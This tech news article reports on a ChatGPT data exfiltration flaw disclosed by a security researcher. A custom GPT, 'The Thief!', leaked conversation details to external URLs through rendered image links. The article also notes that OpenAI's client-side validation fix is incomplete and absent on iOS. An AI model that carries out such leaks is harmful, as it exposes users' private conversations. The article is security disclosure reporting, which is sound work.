AI leader OpenAI has taken crucial steps to address a data exfiltration vulnerability within ChatGPT, its popular language model.

However, despite efforts to mitigate the bug, security concerns persist, especially with incomplete fixes and unaddressed risks on specific platforms.

Race Against Time For ChatGPT

OpenAI Releases Temporary Workaround For ChatGPT Data Exfiltration Bug: What's With The Latest Flaw
(Photo: Mariia Shalabaieva from Unsplash)
Popular AI chatbot ChatGPT was criticized for its data leak flaw that might lure attackers to exploit it. However, OpenAI was quick to roll out an "imperfect" solution to this problem.

Security researcher Johann Rehberger uncovered a data exfiltration technique in ChatGPT, which allowed the potential leakage of conversation details to an external URL. 

The flaw was reported to OpenAI in April 2023, prompting the organization to take immediate action. However, the initial mitigation was not foolproof, leaving room for exploitation under specific conditions.

Related Article: OpenAI Introduces Preparedness Framework to Make "AI Models Safe"

Delayed Response and Public Disclosure: Unveiling The Thief!

Despite the researcher's prompt disclosure, OpenAI's response was delayed, leading to public disclosure on December 12, 2023. 

In his demonstration, Rehberger introduced "The Thief!," a customized tic-tac-toe GPT that showcased the vulnerability. This exposed a method of exfiltrating conversation data to an external URL.

Persistent Risks: Incomplete Fixes and Unprotected Platforms

According to Bleeping Computer, OpenAI's attempt to rectify the flaw involved client-side checks using a validation API to prevent rendering images from unsafe URLs. However, the fix is incomplete, and in some instances, ChatGPT still processes requests to arbitrary domains, leaving potential vulnerabilities. 

"When the server returns an image tag with a hyperlink, there is now a ChatGPT client-side call to a validation API before deciding to display an image. Since ChatGPT is not open source and the fix is not via a Content-Security-Policy (that is visible and inspectable by users and researchers) the exact validation details are not known,"  Rehberger explains about the ChatGPT leak vulnerability.

The discrepancies observed during testing raise questions about the effectiveness of the implemented safety measures.

Unmitigated Threat on iOS: Security Gap in Mobile App

Crucially, the safety checks have not been extended to the iOS mobile app for ChatGPT, leaving the risk unaddressed on this platform. 

With no client-side validation call in place, the potential for data exfiltration remains 100% unmitigated, posing a significant concern for iOS users.

While OpenAI responded to the security issue, clarity is lacking regarding the implementation of the fix on the ChatGPT Android app. 

With over 10 million downloads on Google Play, the uncertainty surrounding the Android app's status raises concerns about the security of a substantial user base.

Meanwhile, a new study says that AI models like ChatGPT are not capable of analyzing SEC filing. 

As per Tech Times report last Dec. 20, they posted inaccurate data that is nowhere to be found in any SEC filings. To test that, the researchers experimented with a prompt if the AI models would answer or deny their question.

At that point, they discovered that the responses were becoming unbearable. They described the AI performance rate as "absolutely unacceptable."

Read Also: Revolutionizing EU Integration: Albania Partners With ChatGPT Maker OpenAI to Speed AI Initiative

Joseph Henry

ⓒ 2024 TECHTIMES.com All rights reserved. Do not reproduce without permission.
Join the Discussion